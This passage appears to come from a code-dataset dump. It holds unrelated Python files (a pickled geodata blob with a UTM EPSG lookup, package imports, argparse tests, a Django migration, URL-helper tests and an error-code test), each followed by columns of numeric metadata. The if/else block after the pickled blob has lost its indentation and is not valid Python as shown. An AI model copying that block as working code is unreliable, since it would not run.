\x02\x00\x00bh\xf8)Rr!\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xfc\x17\xadH\xf1\x15\\@\x93y?\xc9x\xef0@\x84\x91\xa8a\t\x16\\@\x93y?\xc9x\xef0@\x84\x91\xa8a\t\x16\\@\xfbo\xca\x81\xc3\xee0@\xfc\x17\xadH\xf1\x15\\@\xfbo\xca\x81\xc3\xee0@\xfc\x17\xadH\xf1\x15\\@\x93y?\xc9x\xef0@r"\x02\x00\x00bh\xf8)Rr#\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00o\xda\xe7\x8c\x83\xe4[@\xebA\xf7\x9b?F0@\x08\xd2 `\x08\xf4[@\xebA\xf7\x9b?F0@\x08\xd2 
`\x08\xf4[@{\x8f\xe9\xbf\xbd)0@o\xda\xe7\x8c\x83\xe4[@{\x8f\xe9\xbf\xbd)0@o\xda\xe7\x8c\x83\xe4[@\xebA\xf7\x9b?F0@r$\x02\x00\x00bh\xf8)Rr%\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe2\x83\x8d\xa1\xd2\x15\\@\x06`\xa8hQ\xf00@\xc7F\xc5\xa4\xe4\x15\\@\x06`\xa8hQ\xf00@\xc7F\xc5\xa4\xe4\x15\\@\xff\xaa\xc8\x8d\xc7\xef0@\xe2\x83\x8d\xa1\xd2\x15\\@\xff\xaa\xc8\x8d\xc7\xef0@\xe2\x83\x8d\xa1\xd2\x15\\@\x06`\xa8hQ\xf00@r&\x02\x00\x00bh\xf8)Rr\'\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xed\x9e<,T\x16\\@\xd0\x1f\xe4\x06\x8d\xca\x0f@\xb1\x10\xc2HT\x16\\@\xd0\x1f\xe4\x06\x8d\xca\x0f@\xb1\x10\xc2HT\x16\\@C\xe75v\x89\xca\x0f@\xed\x9e<,T\x16\\@C\xe75v\x89\xca\x0f@\xed\x9e<,T\x16\\@\xd0\x1f\xe4\x06\x8d\xca\x0f@r(\x02\x00\x00bh\xf8)Rr)\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x003\\\xd3r\xd6\xec[@\x0f\xfc^\xf9\xe2\x950@D\xa8\xadl\xfa\xec[@\x0f\xfc^\xf9\xe2\x950@D\xa8\xadl\xfa\xec[@j]\xb4\x11\x99\x950@3\\\xd3r\xd6\xec[@j]\xb4\x11\x99\x950@3\\\xd3r\xd6\xec[@\x0f\xfc^\xf9\xe2\x950@r*\x02\x00\x00bh\xf8)Rr+\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00<\x83+E\x17\x12\\@\xc1R]\xc0\xcb\xbc\x0f@u{\xa4\x1c\'\x12\\@\xc1R]\xc0\xcb\xbc\x0f@u{\xa4\x1c\'\x12\\@\x15\xca\xc2\xd7\xd7\xba\x0f@<\x83+E\x17\x12\\@\x15\xca\xc2\xd7\xd7\xba\x0f@<\x83+E\x17\x12\\@\xc1R]\xc0\xcb\xbc\x0f@r,\x02\x00\x00bh\xf8)Rr-\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x90`O\xe0\xc2\xe9[@\x85{e\xde\xaa\x930@\xfe\xf7;o>\xeb[@\x85{e\xde\xaa\x930@\xfe\xf7;o>\xeb[@\xf6\x14\xef\xb6\xc1\x8f0@\x90`O\xe0\xc2\xe9[@\xf6\x14\xef\xb6\xc1\x8f0@\x90`O\xe0\xc2\xe9[@\x85{e\xde\xaa\x930@r.\x02\x00\x00bh\xf8)Rr/\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe0\xfbvmJ\xef[@\xc6\xdb\xef\xf5Zw0@\xd6\xee\rt\xa3\xef[@\xc6\xdb\xef\xf5Zw0@\xd6\xee\rt\xa3\xef[@G8-x\xd1u0@\xe0\xfbvmJ\xef[@G8-x\xd1u0@\xe0\xfbvmJ\xef[@\xc6\xdb\xef\xf5Zw0@r0\x02\x00\x00bh\xf8)Rr1\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\
x00\xab\xaeC5%\xcc[@\x07\x841}\n\x9b/@\xd5\x1d0\xb4_\xce[@\x07\x841}\n\x9b/@\xd5\x1d0\xb4_\xce[@\x0c\xbcI\xc2t\x8c/@\xab\xaeC5%\xcc[@\x0c\xbcI\xc2t\x8c/@\xab\xaeC5%\xcc[@\x07\x841}\n\x9b/@r2\x02\x00\x00bh\xf8)Rr3\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xbe3\xda\xaa$\x15\\@\xcb\xe1\xee\x07\x97\xf30@\xc3}\x89\x1d2\x15\\@\xcb\xe1\xee\x07\x97\xf30@\xc3}\x89\x1d2\x15\\@s\x1f\xcaaA\xf30@\xbe3\xda\xaa$\x15\\@s\x1f\xcaaA\xf30@\xbe3\xda\xaa$\x15\\@\xcb\xe1\xee\x07\x97\xf30@r4\x02\x00\x00bh\xf8)Rr5\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe0+_<(\xe0[@I$\x1bYCs0@UTX\x04\xda\xe0[@I$\x1bYCs0@UTX\x04\xda\xe0[@\x83R\xb4r/r0@\xe0+_<(\xe0[@\x83R\xb4r/r0@\xe0+_<(\xe0[@I$\x1bYCs0@r6\x02\x00\x00bh\xf8)Rr7\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xd8\x95;\xd8\x87x\\@\xd4*\xfaC333@~\x19\x8c\x11\x89x\\@\xd4*\xfaC333@~\x19\x8c\x11\x89x\\@\xbe\xfa\xd3\xa1.33@\xd8\x95;\xd8\x87x\\@\xbe\xfa\xd3\xa1.33@\xd8\x95;\xd8\x87x\\@\xd4*\xfaC333@r8\x02\x00\x00bh\xf8)Rr9\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00l\xf97\x1e"\x16\\@\xb9\xcb\xd9\x96\\\xec0@\xe0\\\r\x9a\'\x16\\@\xb9\xcb\xd9\x96\\\xec0@\xe0\\\r\x9a\'\x16\\@\xfdP\xc4}?\xec0@l\xf97\x1e"\x16\\@\xfdP\xc4}?\xec0@l\xf97\x1e"\x16\\@\xb9\xcb\xd9\x96\\\xec0@r:\x02\x00\x00bh\xf8)Rr;\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00Q}\x8c^28\\@\x10\x8a\xf7-\x84\xd20@a\xa5\x82\x8a\xaa9\\@\x10\x8a\xf7-\x84\xd20@a\xa5\x82\x8a\xaa9\\@\xf2\x04g\x95>\xcd0@Q}\x8c^28\\@\xf2\x04g\x95>\xcd0@Q}\x8c^28\\@\x10\x8a\xf7-\x84\xd20@r<\x02\x00\x00bh\xf8)Rr=\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x004\xf2y\xc5S\xe1\\@\x9aCR\x0b%\xc3#@\xb9\x89Z\x9a[\xe1\\@\x9aCR\x0b%\xc3#@\xb9\x89Z\x9a[\xe1\\@1\xb5\xa5\x0e\xf2\xc2#@4\xf2y\xc5S\xe1\\@1\xb5\xa5\x0e\xf2\xc2#@4\xf2y\xc5S\xe1\\@\x9aCR\x0b%\xc3#@r>\x02\x00\x00bh\xf8)Rr?\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xff\x05\x82\x00\x99\xd9\\@\x1e\x9a\xc3\xffg\xe6+@\xa5\x89\
xd29\x9a\xd9\\@\x1e\x9a\xc3\xffg\xe6+@\xa5\x89\xd29\x9a\xd9\\@\x17X\x11\x7f^\xe6+@\xff\x05\x82\x00\x99\xd9\\@\x17X\x11\x7f^\xe6+@\xff\x05\x82\x00\x99\xd9\\@\x1e\x9a\xc3\xffg\xe6+@r@\x02\x00\x00bh\xf8)RrA\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xb3\xc2>K!B\\@\xba-\x91\x0b\xce\x8c3@\xb9\xef\x07\xf2"B\\@\xba-\x91\x0b\xce\x8c3@\xb9\xef\x07\xf2"B\\@\x17I\xbb\xd1\xc7\x8c3@\xb3\xc2>K!B\\@\x17I\xbb\xd1\xc7\x8c3@\xb3\xc2>K!B\\@\xba-\x91\x0b\xce\x8c3@rB\x02\x00\x00bh\xf8)RrC\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xaf\xf2_{\xc1\r\\@\x0cW\x07@\xdcy/@\x9e\x07wgm\x10\\@\x0cW\x07@\xdcy/@\x9e\x07wgm\x10\\@\xbcy\xaaCnj/@\xaf\xf2_{\xc1\r\\@\xbcy\xaaCnj/@\xaf\xf2_{\xc1\r\\@\x0cW\x07@\xdcy/@rD\x02\x00\x00bh\xf8)RrE\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xd5bK\xea\xdf\xef[@h\t\x8d\xbb\x9c\x8b0@\x89\x925\x8f\xe8\xef[@h\t\x8d\xbb\x9c\x8b0@\x89\x925\x8f\xe8\xef[@2e\x96\xf3{\x8b0@\xd5bK\xea\xdf\xef[@2e\x96\xf3{\x8b0@\xd5bK\xea\xdf\xef[@h\t\x8d\xbb\x9c\x8b0@rF\x02\x00\x00bh\xf8)RrG\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00z\x17\x94\x0e\xfb\x15\\@\xd6$.\xb6\xff\xeb0@p\xfa\xc4K\x01\x16\\@\xd6$.\xb6\xff\xeb0@p\xfa\xc4K\x01\x16\\@3NCT\xe1\xeb0@z\x17\x94\x0e\xfb\x15\\@3NCT\xe1\xeb0@z\x17\x94\x0e\xfb\x15\\@\xd6$.\xb6\xff\xeb0@rH\x02\x00\x00bh\xf8)RrI\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xeb\xfa\xaa\x01\xef.]@@\xfcW\xb1SU0@\xf1\x16\xa3\t\xef.]@@\xfcW\xb1SU0@\xf1\x16\xa3\t\xef.]@\xff\x0c\xca\x8fSU0@\xeb\xfa\xaa\x01\xef.]@\xff\x0c\xca\x8fSU0@\xeb\xfa\xaa\x01\xef.]@@\xfcW\xb1SU0@rJ\x02\x00\x00betrK\x02\x00\x00bsbe]rL\x02\x00\x00(h\x07h\x08}rM\x02\x00\x00(h\nh\x0bh\x0cK\x00\x85rN\x02\x00\x00h\x0e\x87rO\x02\x00\x00RrP\x02\x00\x00(K\x01K\x02\x85rQ\x02\x00\x00h\x15\x89]rR\x02\x00\x00(h\x19h\x1aetrS\x02\x00\x00bh\x1dNu\x86rT\x02\x00\x00RrU\x02\x00\x00h\x07h\x08}rV\x02\x00\x00(h\nh\x0bh\x0cK\x00\x85rW\x02\x00\x00h\x0e\x87rX\x02\x00\x00RrY\x02\x00\x00(K\x01K\x01\x85rZ\x02\x00\x
00h\x15\x89]r[\x02\x00\x00h\x1batr\\\x02\x00\x00bh\x1dNu\x86r]\x02\x00\x00Rr^\x02\x00\x00e}r_\x02\x00\x00X\x06\x00\x00\x000.14.1r`\x02\x00\x00}ra\x02\x00\x00(X\x04\x00\x00\x00axesrb\x02\x00\x00h\x06X\x06\x00\x00\x00blocksrc\x02\x00\x00]rd\x02\x00\x00(}re\x02\x00\x00(X\x06\x00\x00\x00valuesrf\x02\x00\x00h*X\x08\x00\x00\x00mgr_locsrg\x02\x00\x00cbuiltins\nslice\nrh\x02\x00\x00K\x00K\x02K\x01\x87ri\x02\x00\x00Rrj\x02\x00\x00u}rk\x02\x00\x00(jf\x02\x00\x00h\xf1jg\x02\x00\x00jh\x02\x00\x00K\x02K\x03K\x01\x87rl\x02\x00\x00Rrm\x02\x00\x00ueustrn\x02\x00\x00bX\x04\x00\x00\x00_typro\x02\x00\x00X\t\x00\x00\x00dataframerp\x02\x00\x00X\t\x00\x00\x00_metadatarq\x02\x00\x00]rr\x02\x00\x00(X\x03\x00\x00\x00crsrs\x02\x00\x00X\x15\x00\x00\x00_geometry_column_namert\x02\x00\x00ejs\x02\x00\x00}ru\x02\x00\x00X\x04\x00\x00\x00initrv\x02\x00\x00X\t\x00\x00\x00epsg:4326rw\x02\x00\x00sjt\x02\x00\x00h\x1bub.')
spatial_index = gdf.sindex
possible_matches_index = list(spatial_index.intersection(coordinates))
if len(possible_matches_index) > 0:
possible_matches = gdf.iloc[possible_matches_index]
return int(possible_matches.loc[possible_matches['geometry'].apply(lambda x: x.area).idxmin()]['epsg'])
else:
return get_utm_epsg(coordinates)
def get_utm_epsg(coordinates):
    """Gets the EPSG code for the UTM Zone that intersects a geometry's centroid.

    Parameters
    ----------
    coordinates : tuple of float
        (longitude, latitude) in decimal degrees — presumably EPSG:4326;
        TODO confirm against callers.

    Returns
    -------
    int
        EPSG code of the WGS84/UTM CRS: 326xx for the northern hemisphere,
        327xx for the southern, where xx is the two-digit UTM zone number.
    """
    lon, lat = coordinates
    # EPSG UTM codes run 32601-32660 (north) / 32701-32760 (south), so the
    # zone number must be zero-padded to two digits: zone 7 in the north is
    # 32607, not 3267 (the original unpadded str() produced the latter).
    zone_number = str(latlon_to_zone_number(lat, lon)).zfill(2)
    # Zone letters N-X denote the northern hemisphere, C-M the southern.
    # Use a string digit on both branches (the original mixed '6' and int 7).
    zone_hemisphere = '6' if latitude_to_zone_letter(lat) >= 'N' else '7'
    return int('32{0}{1}'.format(zone_hemisphere, zone_number))
| 2,099.103448
| 59,885
| 0.733482
| 13,558
| 60,874
| 3.287579
| 0.092713
| 0.313777
| 0.256433
| 0.146726
| 0.825455
| 0.785386
| 0.769973
| 0.742916
| 0.698181
| 0.632311
| 0
| 0.32126
| 0.004468
| 60,874
| 28
| 59,886
| 2,174.071429
| 0.414244
| 0.003253
| 0
| 0
| 0
| 0.588235
| 0.390337
| 0.389677
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
eaf8ade65e738d34ed6cd271255301df4b151ec7
| 392
|
py
|
Python
|
openrec/tf1/utils/evaluators/__init__.py
|
pbaiz/openrec
|
a00de2345844858194ef43ab6845342114a5be93
|
[
"Apache-2.0"
] | 399
|
2018-01-04T15:24:02.000Z
|
2022-03-31T09:39:05.000Z
|
openrec/tf1/utils/evaluators/__init__.py
|
pbaiz/openrec
|
a00de2345844858194ef43ab6845342114a5be93
|
[
"Apache-2.0"
] | 26
|
2018-01-14T04:01:28.000Z
|
2022-02-09T23:36:32.000Z
|
openrec/tf1/utils/evaluators/__init__.py
|
pbaiz/openrec
|
a00de2345844858194ef43ab6845342114a5be93
|
[
"Apache-2.0"
] | 97
|
2017-12-22T07:07:35.000Z
|
2022-01-24T19:04:02.000Z
|
from openrec.tf1.utils.evaluators.evaluator import Evaluator
from openrec.tf1.utils.evaluators.auc import AUC
from openrec.tf1.utils.evaluators.recall import Recall
from openrec.tf1.utils.evaluators.eval_manager import EvalManager
from openrec.tf1.utils.evaluators.mse import MSE
from openrec.tf1.utils.evaluators.ndcg import NDCG
from openrec.tf1.utils.evaluators.precision import Precision
| 49
| 65
| 0.857143
| 57
| 392
| 5.877193
| 0.263158
| 0.229851
| 0.292537
| 0.397015
| 0.60597
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0.071429
| 392
| 7
| 66
| 56
| 0.901099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dc1de47118500b7850d4301154ca98948438f404
| 1,643
|
py
|
Python
|
tests/test_arg_parser.py
|
bcbogdan/lisa-parser
|
08b636ef1d5ebafc076da11c84e92765cbc381bf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_arg_parser.py
|
bcbogdan/lisa-parser
|
08b636ef1d5ebafc076da11c84e92765cbc381bf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_arg_parser.py
|
bcbogdan/lisa-parser
|
08b636ef1d5ebafc076da11c84e92765cbc381bf
|
[
"Apache-2.0"
] | null | null | null |
from config import init_arg_parser
from nose.tools import assert_equals
def test_default_usage():
    """Parsing only the two required positional args yields the documented defaults."""
    args = init_arg_parser().parse_args(['xmlfilepath', 'logfilepath'])
    assert_equals(args.xml_file_path, 'xmlfilepath')
    assert_equals(args.log_file_path, 'logfilepath')
    assert_equals(args.skipkvp, False)
    assert_equals(args.loglevel, 2)
    assert_equals(args.perf, False)
    assert_equals(args.config, 'config/db.config')
def test_full_arguments_list():
    """Every short-flag option should override its corresponding default."""
    cli = ['xmlfilepath', 'logfilepath', '-k', '-c', 'config', '-l', '3',
           '-p', 'perflogpath']
    args = init_arg_parser().parse_args(cli)
    assert_equals(args.xml_file_path, 'xmlfilepath')
    assert_equals(args.log_file_path, 'logfilepath')
    assert_equals(args.skipkvp, True)
    assert_equals(args.loglevel, 3)
    assert_equals(args.config, 'config')
    assert_equals(args.perf, 'perflogpath')
def test_full_name_arguments_list():
    """Long-form flags should produce the same parsed values as the short flags."""
    args = init_arg_parser().parse_args(
        ['xmlfilepath', 'logfilepath', '--skipkvp',
         '--config', 'config', '--loglevel', '3',
         '--perf', 'perflogpath']
    )
    # Expected attribute values, checked in the same order as the original asserts.
    expected = {
        'xml_file_path': 'xmlfilepath',
        'log_file_path': 'logfilepath',
        'skipkvp': True,
        'loglevel': 3,
        'config': 'config',
        'perf': 'perflogpath',
    }
    for attr, value in expected.items():
        assert_equals(getattr(args, attr), value)
| 37.340909
| 71
| 0.734632
| 190
| 1,643
| 5.973684
| 0.210526
| 0.277533
| 0.285463
| 0.428194
| 0.861674
| 0.794714
| 0.760352
| 0.760352
| 0.760352
| 0.70837
| 0
| 0.003556
| 0.144248
| 1,643
| 43
| 72
| 38.209302
| 0.803698
| 0
| 0
| 0.485714
| 0
| 0
| 0.157638
| 0
| 0
| 0
| 0
| 0
| 0.542857
| 1
| 0.085714
| false
| 0
| 0.057143
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
dc385abc372e1fa11f0e9114d3ba56e2eb3b84db
| 5,114
|
py
|
Python
|
xpense/flockapp/migrations/0001_initial.py
|
akhilraj95/xpense
|
d107662eca77cbee302ce7c8fea8a1bee0d4bb8b
|
[
"MIT"
] | null | null | null |
xpense/flockapp/migrations/0001_initial.py
|
akhilraj95/xpense
|
d107662eca77cbee302ce7c8fea8a1bee0d4bb8b
|
[
"MIT"
] | null | null | null |
xpense/flockapp/migrations/0001_initial.py
|
akhilraj95/xpense
|
d107662eca77cbee302ce7c8fea8a1bee0d4bb8b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-18 09:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema for the ``flockapp`` app.

    Generated by Django 1.10.5 on 2017-02-18. Do not hand-edit; make
    schema changes in a new follow-up migration instead.
    """

    # First migration for this app — allows Django to fast-path creation
    # of the tables when the database is empty.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Chat',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, default='user', max_length=30)),
                ('chatId', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='ChatExpense',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('amount', models.FloatField(default=0.0)),
                ('purpose', models.CharField(default='Unspecified', max_length=100)),
                ('equallyshared', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='Chattrack',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('start_date', models.DateTimeField(auto_now_add=True)),
                ('end_date', models.DateTimeField(auto_now_add=True)),
                ('active', models.BooleanField(default=True)),
                # NOTE(review): the field is named 'user' but points at the
                # Chat model, not User — presumably a chat-owned track;
                # confirm against the model definitions.
                ('user', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Chat')),
            ],
        ),
        migrations.CreateModel(
            name='Currency',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20)),
                ('abbr', models.CharField(max_length=5)),
            ],
        ),
        migrations.CreateModel(
            name='Expense',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('amount', models.FloatField(default=0.0)),
                ('purpose', models.CharField(default='Unspecified', max_length=100)),
                ('equallyshared', models.BooleanField(default=False)),
                ('currency', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Currency')),
            ],
        ),
        migrations.CreateModel(
            name='Track',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('start_date', models.DateTimeField(auto_now_add=True)),
                ('end_date', models.DateTimeField(auto_now_add=True)),
                ('active', models.BooleanField(default=True)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, default='user', max_length=30)),
                ('userId', models.CharField(max_length=100)),
                ('token', models.CharField(max_length=100)),
            ],
        ),
        # Remaining foreign keys are added after all models exist, as
        # emitted by the migration autodetector.
        migrations.AddField(
            model_name='track',
            name='user',
            field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.User'),
        ),
        migrations.AddField(
            model_name='expense',
            name='paidby',
            field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.User'),
        ),
        migrations.AddField(
            model_name='expense',
            name='track',
            field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Track'),
        ),
        migrations.AddField(
            model_name='chatexpense',
            name='currency',
            field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Currency'),
        ),
        migrations.AddField(
            model_name='chatexpense',
            name='paidby',
            field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.User'),
        ),
        migrations.AddField(
            model_name='chatexpense',
            name='track',
            field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Chattrack'),
        ),
    ]
| 44.469565
| 143
| 0.578412
| 506
| 5,114
| 5.713439
| 0.171937
| 0.057074
| 0.055344
| 0.068488
| 0.819094
| 0.809754
| 0.75614
| 0.75614
| 0.75614
| 0.75614
| 0
| 0.012761
| 0.27982
| 5,114
| 114
| 144
| 44.859649
| 0.772197
| 0.013297
| 0
| 0.726415
| 1
| 0
| 0.09538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028302
| 0
| 0.066038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc5a2294ad08f574a5be35fda99d8613ce9b8e8e
| 1,625
|
py
|
Python
|
tests/crawler/lib_test.py
|
DBeath/feedsearch-crawler
|
91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9
|
[
"MIT"
] | 20
|
2019-11-02T18:46:11.000Z
|
2022-03-18T16:22:32.000Z
|
tests/crawler/lib_test.py
|
DBeath/feedsearch-crawler
|
91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9
|
[
"MIT"
] | 8
|
2019-11-02T08:26:17.000Z
|
2021-05-07T15:11:17.000Z
|
tests/crawler/lib_test.py
|
DBeath/feedsearch-crawler
|
91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9
|
[
"MIT"
] | 5
|
2020-06-18T15:44:48.000Z
|
2022-02-19T14:21:47.000Z
|
from feedsearch_crawler.crawler.lib import coerce_url, is_same_domain
from yarl import URL
def test_coerce_url():
    """coerce_url normalises bare and scheme-relative URLs, and upgrades
    the scheme when https=True; non-http schemes pass through."""
    # Default (https=False) behaviour.
    for raw, expected in [
        ("test.com", "http://test.com"),
        ("https://test.com", "https://test.com"),
        (" https://test.com", "https://test.com"),
        ("test.com/path/path2", "http://test.com/path/path2"),
    ]:
        assert coerce_url(raw) == URL(expected)
    # https=True forces an https scheme (including http -> https upgrade).
    for raw, expected in [
        ("test.com", "https://test.com"),
        ("https://test.com", "https://test.com"),
        (" https://test.com", "https://test.com"),
        ("http://test.com", "https://test.com"),
        ("test.com/path/path2", "https://test.com/path/path2"),
    ]:
        assert coerce_url(raw, https=True) == URL(expected)
    # Scheme-relative and non-http schemes.
    for raw, expected in [
        ("//test.com", "http://test.com"),
        ("feed://test.com", "feed://test.com"),
        ("feed://www.internet-law.de/?feed=/feed/", "feed://www.internet-law.de/?feed=/feed/"),
    ]:
        assert coerce_url(raw) == URL(expected)
def test_is_same_domain():
    """is_same_domain(host, other): the second host may be a subdomain of
    the first, but not the other way round (asymmetric by design)."""
    cases = [
        ("test.com", "test.com", True),
        ("example.com", "test.com", False),
        ("feeds.test.com", "test.com", False),
        ("test.com", "feeds.test.com", True),
        ("test.com", "test.feeds.test.com", True),
        ("www.test.com", "test.com", True),
        ("www.test.com", "feed.test.com", True),
        ("test.www.test.com", "test.com", False),
    ]
    for first_host, second_host, expected in cases:
        assert is_same_domain(first_host, second_host) is expected
| 47.794118
| 81
| 0.664
| 254
| 1,625
| 4.102362
| 0.110236
| 0.24856
| 0.172745
| 0.158349
| 0.855086
| 0.855086
| 0.783109
| 0.759117
| 0.699616
| 0.510557
| 0
| 0.002849
| 0.136
| 1,625
| 33
| 82
| 49.242424
| 0.739316
| 0
| 0
| 0.142857
| 0
| 0
| 0.374154
| 0.048
| 0
| 0
| 0
| 0
| 0.714286
| 1
| 0.071429
| true
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dcb2d1ffd53bc700a4d23c8a446b83de5fdc1e20
| 168
|
py
|
Python
|
tests/nex/test_errors.py
|
azillion/DodoTrafficControl
|
9aa014f6d1ac3ad4ea5747d7ded4749ea60f7422
|
[
"MIT"
] | 209
|
2017-05-15T19:38:34.000Z
|
2020-11-30T03:31:07.000Z
|
tests/nex/test_errors.py
|
azillion/DodoTrafficControl
|
9aa014f6d1ac3ad4ea5747d7ded4749ea60f7422
|
[
"MIT"
] | 44
|
2018-07-06T16:08:54.000Z
|
2020-11-29T20:04:32.000Z
|
tests/nex/test_errors.py
|
azillion/DodoTrafficControl
|
9aa014f6d1ac3ad4ea5747d7ded4749ea60f7422
|
[
"MIT"
] | 34
|
2017-05-23T17:35:57.000Z
|
2020-11-29T17:37:16.000Z
|
from nintendo.nex import errors
def test_basic():
    """error_names and error_codes are inverse lookup tables (spot check)."""
    name = errors.error_names[0x10001]
    assert name == "Core::Unknown"
    assert errors.error_codes[name] == 0x10001
| 24
| 55
| 0.72619
| 22
| 168
| 5.409091
| 0.681818
| 0.201681
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.142857
| 168
| 6
| 56
| 28
| 0.743056
| 0
| 0
| 0
| 0
| 0
| 0.161491
| 0
| 0
| 0
| 0.086957
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
